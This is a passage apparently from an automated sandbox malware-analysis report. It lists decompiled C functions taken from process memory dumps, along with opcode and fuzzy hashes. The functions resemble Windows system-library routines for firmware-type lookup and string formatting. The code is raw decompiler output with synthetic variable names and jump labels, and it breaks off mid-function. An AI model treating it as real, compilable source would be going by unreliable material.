                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 6930f473490dedb942da88ec9b71cc2b860a34497508097816b80ccb6bb28e58
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: E491C4312043419FE726CE25C841BABB7E6FF84714F5489ADFA95CB690D7B4E804CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02B751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed short* _t63;
                        				signed int _t64;
                        				signed int _t65;
                        				signed int _t67;
                        				intOrPtr _t74;
                        				intOrPtr _t84;
                        				intOrPtr _t88;
                        				intOrPtr _t94;
                        				void* _t100;
                        				void* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t113;
                        				signed int* _t115;
                        				signed short* _t117;
                        				void* _t118;
                        				void* _t119;
                        
                        				_push(0x80);
                        				_push(0x2bd05f0);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                        				_t115 =  *(_t118 + 0xc);
                        				 *(_t118 - 0x7c) = _t115;
                        				 *((char*)(_t118 - 0x65)) = 0;
                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        				_t113 = 0;
                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                        				_t100 = __ecx;
                        				if(_t100 == 0) {
                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        					E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *((char*)(_t118 - 0x65)) = 1;
                        					_t63 =  *(_t118 - 0x90);
                        					_t101 = _t63[2];
                        					_t64 =  *_t63 & 0x0000ffff;
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					L20:
                        					_t65 = _t64 >> 1;
                        					L21:
                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                        					if(_t108 == 0) {
                        						L27:
                        						 *_t115 = _t65 + 1;
                        						_t67 = 0xc0000023;
                        						L28:
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                        						L29:
                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                        						E02B753CA(0);
                        						return E02B4D130(0, _t113, _t115);
                        					}
                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                        							 *_t108 = 0;
                        						}
                        						goto L27;
                        					}
                        					 *_t115 = _t65;
                        					_t115 = _t65 + _t65;
                        					E02B3F3E0(_t108, _t101, _t115);
                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                        					_t67 = 0;
                        					goto L28;
                        				}
                        				_t103 = _t100 - 1;
                        				if(_t103 == 0) {
                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                        					_t74 = E02B13690(1, _t117, 0x2ad1810, _t118 - 0x74);
                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                        					_t101 = _t117[2];
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					if(_t74 < 0) {
                        						_t64 =  *_t117 & 0x0000ffff;
                        						_t115 =  *(_t118 - 0x7c);
                        						goto L20;
                        					}
                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                        					_t115 =  *(_t118 - 0x7c);
                        					goto L21;
                        				}
                        				if(_t103 == 1) {
                        					_t105 = 4;
                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                        					_push(_t118 - 0x70);
                        					_push(0);
                        					_push(0);
                        					_push(_t105);
                        					_push(_t118 - 0x78);
                        					_push(0x6b);
                        					 *((intOrPtr*)(_t118 - 0x64)) = E02B3AA90();
                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        					_t113 = L02B14620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                        					if(_t113 != 0) {
                        						_push(_t118 - 0x70);
                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                        						_push(_t113);
                        						_push(4);
                        						_push(_t118 - 0x78);
                        						_push(0x6b);
                        						_t84 = E02B3AA90();
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                        						if(_t84 < 0) {
                        							goto L29;
                        						}
                        						_t110 = 0;
                        						_t106 = 0;
                        						while(1) {
                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                        							 *(_t118 - 0x88) = _t106;
                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                        								break;
                        							}
                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                        							_t106 = _t106 + 1;
                        						}
                        						_t88 = E02B7500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                        						_t119 = _t119 + 0x1c;
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                        						if(_t88 < 0) {
                        							goto L29;
                        						}
                        						_t101 = _t118 - 0x3c;
                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                        						goto L21;
                        					}
                        					_t67 = 0xc0000017;
                        					goto L28;
                        				}
                        				_push(0);
                        				_push(0x20);
                        				_push(_t118 - 0x60);
                        				_push(0x5a);
                        				_t94 = E02B39860();
                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                        				if(_t94 < 0) {
                        					goto L29;
                        				}
                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                        					_t101 = L"Legacy";
                        					_push(6);
                        				} else {
                        					_t101 = L"UEFI";
                        					_push(4);
                        				}
                        				_pop(_t65);
                        				goto L21;
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: 0c676536eeb71be75370ee2e17514e5817a14dafb4380da3de8462778635fa85
                        • Instruction ID: d8dfbba44f39227040aaa4ddcbcf8d10880123556be7a9301c4f2cef15aeba10
                        • Opcode Fuzzy Hash: 0c676536eeb71be75370ee2e17514e5817a14dafb4380da3de8462778635fa85
                        • Instruction Fuzzy Hash: F6517D71A046089FDB24DFA8C880BADBBF9FB48704F5580ADE95AEB251DB709900CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02AFB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                        				signed int _t65;
                        				signed short _t69;
                        				intOrPtr _t70;
                        				signed short _t85;
                        				void* _t86;
                        				signed short _t89;
                        				signed short _t91;
                        				intOrPtr _t92;
                        				intOrPtr _t97;
                        				intOrPtr* _t98;
                        				signed short _t99;
                        				signed short _t101;
                        				void* _t102;
                        				char* _t103;
                        				signed short _t104;
                        				intOrPtr* _t110;
                        				void* _t111;
                        				void* _t114;
                        				intOrPtr* _t115;
                        
                        				_t109 = __esi;
                        				_t108 = __edi;
                        				_t106 = __edx;
                        				_t95 = __ebx;
                        				_push(0x90);
                        				_push(0x2bcf7a8);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                        				if(__edx == 0xffffffff) {
                        					L6:
                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) != 0) {
                        						L3:
                        						L4:
                        						return E02B4D130(_t95, _t108, _t109);
                        					}
                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                        					_t108 = 0;
                        					_t109 = 0;
                        					_t95 = 0;
                        					__eflags = 0;
                        					while(1) {
                        						__eflags = _t95 - 0x200;
                        						if(_t95 >= 0x200) {
                        							break;
                        						}
                        						E02B3D000(0x80);
                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                        						_t108 = _t115;
                        						_t95 = _t95 - 0xffffff80;
                        						_t17 = _t114 - 4;
                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                        						__eflags =  *_t17;
                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t102 = _t110 + 1;
                        						do {
                        							_t85 =  *_t110;
                        							_t110 = _t110 + 1;
                        							__eflags = _t85;
                        						} while (_t85 != 0);
                        						_t111 = _t110 - _t102;
                        						_t21 = _t95 - 1; // -129
                        						_t86 = _t21;
                        						__eflags = _t111 - _t86;
                        						if(_t111 > _t86) {
                        							_t111 = _t86;
                        						}
                        						E02B3F3E0(_t108, _t106, _t111);
                        						_t115 = _t115 + 0xc;
                        						_t103 = _t111 + _t108;
                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                        						_t89 = _t95 - _t111;
                        						__eflags = _t89;
                        						_push(0);
                        						if(_t89 == 0) {
                        							L15:
                        							_t109 = 0xc000000d;
                        							goto L16;
                        						} else {
                        							__eflags = _t89 - 0x7fffffff;
                        							if(_t89 <= 0x7fffffff) {
                        								L16:
                        								 *(_t114 - 0x94) = _t109;
                        								__eflags = _t109;
                        								if(_t109 < 0) {
                        									__eflags = _t89;
                        									if(_t89 != 0) {
                        										 *_t103 = 0;
                        									}
                        									L26:
                        									 *(_t114 - 0xa0) = _t109;
                        									 *(_t114 - 4) = 0xfffffffe;
                        									__eflags = _t109;
                        									if(_t109 >= 0) {
                        										L31:
                        										_t98 = _t108;
                        										_t39 = _t98 + 1; // 0x1
                        										_t106 = _t39;
                        										do {
                        											_t69 =  *_t98;
                        											_t98 = _t98 + 1;
                        											__eflags = _t69;
                        										} while (_t69 != 0);
                        										_t99 = _t98 - _t106;
                        										__eflags = _t99;
                        										L34:
                        										_t70 =  *[fs:0x30];
                        										__eflags =  *((char*)(_t70 + 2));
                        										if( *((char*)(_t70 + 2)) != 0) {
                        											L40:
                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                        											 *(_t114 - 4) = 1;
                        											_push(_t114 - 0x74);
                        											L02B4DEF0(_t99, _t106);
                        											 *(_t114 - 4) = 0xfffffffe;
                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        											goto L3;
                        										}
                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                        											goto L40;
                        										}
                        										_push( *((intOrPtr*)(_t114 + 8)));
                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                        										_push(_t99 & 0x0000ffff);
                        										_push(_t108);
                        										_push(1);
                        										_t101 = E02B3B280();
                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                        										if( *((char*)(_t114 + 0x14)) == 1) {
                        											__eflags = _t101 - 0x80000003;
                        											if(_t101 == 0x80000003) {
                        												E02B3B7E0(1);
                        												_t101 = 0;
                        												__eflags = 0;
                        											}
                        										}
                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        										goto L4;
                        									}
                        									__eflags = _t109 - 0x80000005;
                        									if(_t109 == 0x80000005) {
                        										continue;
                        									}
                        									break;
                        								}
                        								 *(_t114 - 0x90) = 0;
                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                        								_t91 = E02B3E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                        								_t115 = _t115 + 0x10;
                        								_t104 = _t91;
                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                        								__eflags = _t104;
                        								if(_t104 < 0) {
                        									L21:
                        									_t109 = 0x80000005;
                        									 *(_t114 - 0x90) = 0x80000005;
                        									L22:
                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                        									L23:
                        									 *(_t114 - 0x94) = _t109;
                        									goto L26;
                        								}
                        								__eflags = _t104 - _t92;
                        								if(__eflags > 0) {
                        									goto L21;
                        								}
                        								if(__eflags == 0) {
                        									goto L22;
                        								}
                        								goto L23;
                        							}
                        							goto L15;
                        						}
                        					}
                        					__eflags = _t109;
                        					if(_t109 >= 0) {
                        						goto L31;
                        					}
                        					__eflags = _t109 - 0x80000005;
                        					if(_t109 != 0x80000005) {
                        						goto L31;
                        					}
                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                        					_t38 = _t95 - 1; // -129
                        					_t99 = _t38;
                        					goto L34;
                        				}
                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        					__eflags = __edx - 0x65;
                        					if(__edx != 0x65) {
                        						goto L2;
                        					}
                        					goto L6;
                        				}
                        				L2:
                        				_push( *((intOrPtr*)(_t114 + 8)));
                        				_push(_t106);
                        				if(E02B3A890() != 0) {
                        					goto L6;
                        				}
                        				goto L3;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: e668b671d083beddac5713e4996b1c771153d04b15ac73d104a175e61bd725cb
                        • Instruction ID: d1188a93e97993f3beba604d796bf1b277ba30491df9fb5c9acfac9052c41f7f
                        • Opcode Fuzzy Hash: e668b671d083beddac5713e4996b1c771153d04b15ac73d104a175e61bd725cb
                        • Instruction Fuzzy Hash: E951DC71D002A98FEF218F68C845BAEBBB1FF04714F2041E9ED59AB281D7785985CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02B1B944(signed int* __ecx, char __edx) {
                        				signed int _v8;
                        				signed int _v16;
                        				signed int _v20;
                        				char _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				signed int* _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v77;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t65;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				char* _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t78;
                        				signed int _t82;
                        				intOrPtr _t83;
                        				void* _t87;
                        				char _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t91;
                        				void* _t97;
                        				intOrPtr _t100;
                        				void* _t102;
                        				void* _t107;
                        				signed int _t108;
                        				intOrPtr* _t112;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr _t115;
                        				intOrPtr _t116;
                        				intOrPtr _t117;
                        				signed int _t118;
                        				void* _t130;
                        
                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                        				_v8 =  *0x2bed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                        				_t112 = __ecx;
                        				_v77 = __edx;
                        				_v48 = __ecx;
                        				_v28 = 0;
                        				_t5 = _t112 + 0xc; // 0x575651ff
                        				_t105 =  *_t5;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(_t105 == 0) {
                        					_t50 = _t112 + 4; // 0x5de58b5b
                        					_t60 =  *__ecx |  *_t50;
                        					if(( *__ecx |  *_t50) != 0) {
                        						 *__ecx = 0;
                        						__ecx[1] = 0;
                        						if(E02B17D50() != 0) {
                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t65 = 0x7ffe0386;
                        						}
                        						if( *_t65 != 0) {
                        							E02BC8CD6(_t112);
                        						}
                        						_push(0);
                        						_t52 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t52);
                        						_t60 = E02B39E20();
                        					}
                        					L20:
                        					_pop(_t107);
                        					_pop(_t113);
                        					_pop(_t87);
                        					return E02B3B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                        				}
                        				_t8 = _t112 + 8; // 0x8b000cc2
                        				_t67 =  *_t8;
                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                        				_t108 =  *(_t67 + 0x14);
                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                        				_t105 = 0x2710;
                        				asm("sbb eax, edi");
                        				_v44 = _t88;
                        				_v52 = _t108;
                        				_t60 = E02B3CE00(_t97, _t68, 0x2710, 0);
                        				_v56 = _t60;
                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                        					L3:
                        					 *(_t112 + 0x44) = _t60;
                        					_t105 = _t60 * 0x2710 >> 0x20;
                        					 *_t112 = _t88;
                        					 *(_t112 + 4) = _t108;
                        					_v20 = _t60 * 0x2710;
                        					_v16 = _t60 * 0x2710 >> 0x20;
                        					if(_v77 != 0) {
                        						L16:
                        						_v36 = _t88;
                        						_v32 = _t108;
                        						if(E02B17D50() != 0) {
                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t73 = 0x7ffe0386;
                        						}
                        						if( *_t73 != 0) {
                        							_t105 = _v40;
                        							E02BC8F6A(_t112, _v40, _t88, _t108);
                        						}
                        						_push( &_v28);
                        						_push(0);
                        						_push( &_v36);
                        						_t48 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t48);
                        						_t60 = E02B3AF60();
                        						goto L20;
                        					} else {
                        						_t89 = 0x7ffe03b0;
                        						do {
                        							_t114 = 0x7ffe0010;
                        							do {
                        								_t77 =  *0x2be8628; // 0x0
                        								_v68 = _t77;
                        								_t78 =  *0x2be862c; // 0x0
                        								_v64 = _t78;
                        								_v72 =  *_t89;
                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                        								while(1) {
                        									_t105 =  *0x7ffe000c;
                        									_t100 =  *0x7ffe0008;
                        									if(_t105 ==  *_t114) {
                        										goto L8;
                        									}
                        									asm("pause");
                        								}
                        								L8:
                        								_t89 = 0x7ffe03b0;
                        								_t115 =  *0x7ffe03b0;
                        								_t82 =  *0x7FFE03B4;
                        								_v60 = _t115;
                        								_t114 = 0x7ffe0010;
                        								_v56 = _t82;
                        							} while (_v72 != _t115 || _v76 != _t82);
                        							_t83 =  *0x2be8628; // 0x0
                        							_t116 =  *0x2be862c; // 0x0
                        							_v76 = _t116;
                        							_t117 = _v68;
                        						} while (_t117 != _t83 || _v64 != _v76);
                        						asm("sbb edx, [esp+0x24]");
                        						_t102 = _t100 - _v60 - _t117;
                        						_t112 = _v48;
                        						_t91 = _v44;
                        						asm("sbb edx, eax");
                        						_t130 = _t105 - _v52;
                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                        							_t88 = _t102 - _t91;
                        							asm("sbb edx, edi");
                        							_t108 = _t105;
                        						} else {
                        							_t88 = 0;
                        							_t108 = 0;
                        						}
                        						goto L16;
                        					}
                        				} else {
                        					if( *(_t112 + 0x44) == _t60) {
                        						goto L20;
                        					}
                        					goto L3;
                        				}
                        			}

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B1B9A5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 0d6228646710c22f5297fbbe5cdfe0c0e9a357b629124264a0425751dd222705
                        • Instruction ID: ce70d3080985adc002a22e796ffc6e3fd8cdf052929c211c26dd82dfb727182c
                        • Opcode Fuzzy Hash: 0d6228646710c22f5297fbbe5cdfe0c0e9a357b629124264a0425751dd222705
                        • Instruction Fuzzy Hash: 3B515971A18740CFC720DF29C480A2BBBE5FB88748F9449AEF99597354DB70E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02B22581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, void* _a1546912430) {
                        				signed int _v8;
                        				signed int _v16;
                        				unsigned int _v24;
                        				void* _v28;
                        				signed int _v32;
                        				unsigned int _v36;
                        				void* _v37;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _t237;
                        				signed int _t241;
                        				signed int _t246;
                        				signed int _t248;
                        				intOrPtr _t250;
                        				signed int _t253;
                        				signed int _t260;
                        				signed int _t263;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				void* _t282;
                        				void* _t283;
                        				signed int _t284;
                        				unsigned int _t287;
                        				signed int _t291;
                        				signed int _t294;
                        				signed int _t298;
                        				intOrPtr _t318;
                        				signed int _t327;
                        				signed int _t329;
                        				signed int _t330;
                        				signed int _t334;
                        				signed int _t335;
                        				signed int _t338;
                        				signed int _t340;
                        				signed int _t342;
                        				void* _t343;
                        				signed int _t345;
                        				void* _t346;
                        
                        				_t340 = _t342;
                        				_t343 = _t342 - 0x4c;
                        				_v8 =  *0x2bed360 ^ _t340;
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t334 = 0x2beb2e8;
                        				_v56 = _a4;
                        				_v48 = __edx;
                        				_v60 = __ecx;
                        				_t287 = 0;
                        				_v80 = 0;
                        				asm("movsd");
                        				_v64 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				asm("movsd");
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v68 = 0;
                        				asm("movsd");
                        				_v32 = 0;
                        				_v36 = 0;
                        				asm("movsd");
                        				_v16 = 0;
                        				_t346 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                        				_t277 = 0x48;
                        				_t308 = 0 | _t346 == 0x00000000;
                        				_t327 = 0;
                        				_v37 = _t346 == 0;
                        				if(_v48 <= 0) {
                        					L16:
                        					_t45 = _t277 - 0x48; // 0x0
                        					__eflags = _t45 - 0xfffe;
                        					if(_t45 > 0xfffe) {
                        						_t335 = 0xc0000106;
                        						goto L32;
                        					} else {
                        						_t334 = L02B14620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t277);
                        						_v52 = _t334;
                        						__eflags = _t334;
                        						if(_t334 == 0) {
                        							_t335 = 0xc0000017;
                        							goto L32;
                        						} else {
                        							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
                        							_t50 = _t334 + 0x48; // 0x48
                        							_t329 = _t50;
                        							_t308 = _v32;
                        							 *(_t334 + 0x3c) = _t277;
                        							_t279 = 0;
                        							 *((short*)(_t334 + 0x30)) = _v48;
                        							__eflags = _t308;
                        							if(_t308 != 0) {
                        								 *(_t334 + 0x18) = _t329;
                        								__eflags = _t308 - 0x2be8478;
                        								 *_t334 = ((0 | _t308 == 0x02be8478) - 0x00000001 & 0xfffffffb) + 7;
                        								E02B3F3E0(_t329,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                        								_t308 = _v32;
                        								_t343 = _t343 + 0xc;
                        								_t279 = 1;
                        								__eflags = _a8;
                        								_t329 = _t329 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                        								if(_a8 != 0) {
                        									_t271 = E02B839F2(_t329);
                        									_t308 = _v32;
                        									_t329 = _t271;
                        								}
                        							}
                        							_t291 = 0;
                        							_v16 = 0;
                        							__eflags = _v48;
                        							if(_v48 <= 0) {
                        								L31:
                        								_t335 = _v68;
                        								__eflags = 0;
                        								 *((short*)(_t329 - 2)) = 0;
                        								goto L32;
                        							} else {
                        								_t277 = _t334 + _t279 * 4;
                        								_v56 = _t277;
                        								do {
                        									__eflags = _t308;
                        									if(_t308 != 0) {
                        										_t237 =  *(_v60 + _t291 * 4);
                        										__eflags = _t237;
                        										if(_t237 == 0) {
                        											goto L30;
                        										} else {
                        											__eflags = _t237 == 5;
                        											if(_t237 == 5) {
                        												goto L30;
                        											} else {
                        												goto L22;
                        											}
                        										}
                        									} else {
                        										L22:
                        										 *_t277 =  *(_v60 + _t291 * 4);
                        										 *(_t277 + 0x18) = _t329;
                        										_t241 =  *(_v60 + _t291 * 4);
                        										__eflags = _t241 - 8;
                        										if(_t241 > 8) {
                        											goto L56;
                        										} else {
                        											switch( *((intOrPtr*)(_t241 * 4 +  &M02B22959))) {
                        												case 0:
                        													__ax =  *0x2be8488;
                        													__eflags = __ax;
                        													if(__ax == 0) {
                        														goto L29;
                        													} else {
                        														__ax & 0x0000ffff = E02B3F3E0(__edi,  *0x2be848c, __ax & 0x0000ffff);
                        														__eax =  *0x2be8488 & 0x0000ffff;
                        														goto L26;
                        													}
                        													goto L108;
                        												case 1:
                        													L45:
                        													E02B3F3E0(_t329, _v80, _v64);
                        													_t266 = _v64;
                        													goto L26;
                        												case 2:
                        													 *0x2be8480 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be8484,  *0x2be8480 & 0x0000ffff);
                        													__eax =  *0x2be8480 & 0x0000ffff;
                        													__eax = ( *0x2be8480 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													goto L28;
                        												case 3:
                        													__eax = _v44;
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														goto L29;
                        													} else {
                        														__esi = __eax + __eax;
                        														__eax = E02B3F3E0(__edi, _v72, __esi);
                        														__edi = __edi + __esi;
                        														__esi = _v52;
                        														goto L27;
                        													}
                        													goto L108;
                        												case 4:
                        													_push(0x2e);
                        													_pop(__eax);
                        													 *(__esi + 0x44) = __edi;
                        													 *__edi = __ax;
                        													__edi = __edi + 4;
                        													_push(0x3b);
                        													_pop(__eax);
                        													 *(__edi - 2) = __ax;
                        													goto L29;
                        												case 5:
                        													__eflags = _v36;
                        													if(_v36 == 0) {
                        														goto L45;
                        													} else {
                        														E02B3F3E0(_t329, _v76, _v36);
                        														_t266 = _v36;
                        													}
                        													L26:
                        													_t343 = _t343 + 0xc;
                        													_t329 = _t329 + (_t266 >> 1) * 2 + 2;
                        													__eflags = _t329;
                        													L27:
                        													_push(0x3b);
                        													_pop(_t268);
                        													 *((short*)(_t329 - 2)) = _t268;
                        													goto L28;
                        												case 6:
                        													__ebx =  *0x2be575c;
                        													__eflags = __ebx - 0x2be575c;
                        													if(__ebx != 0x2be575c) {
                        														_push(0x3b);
                        														_pop(__esi);
                        														do {
                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                        															E02B3F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                        															__edi = __edi + __eax * 2;
                        															__edi = __edi + 2;
                        															 *(__edi - 2) = __si;
                        															__ebx =  *__ebx;
                        															__eflags = __ebx - 0x2be575c;
                        														} while (__ebx != 0x2be575c);
                        														__esi = _v52;
                        														__ecx = _v16;
                        														__edx = _v32;
                        													}
                        													__ebx = _v56;
                        													goto L29;
                        												case 7:
                        													 *0x2be8478 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be847c,  *0x2be8478 & 0x0000ffff);
                        													__eax =  *0x2be8478 & 0x0000ffff;
                        													__eax = ( *0x2be8478 & 0x0000ffff) >> 1;
                        													__eflags = _a8;
                        													__edi = __edi + __eax * 2;
                        													if(_a8 != 0) {
                        														__ecx = __edi;
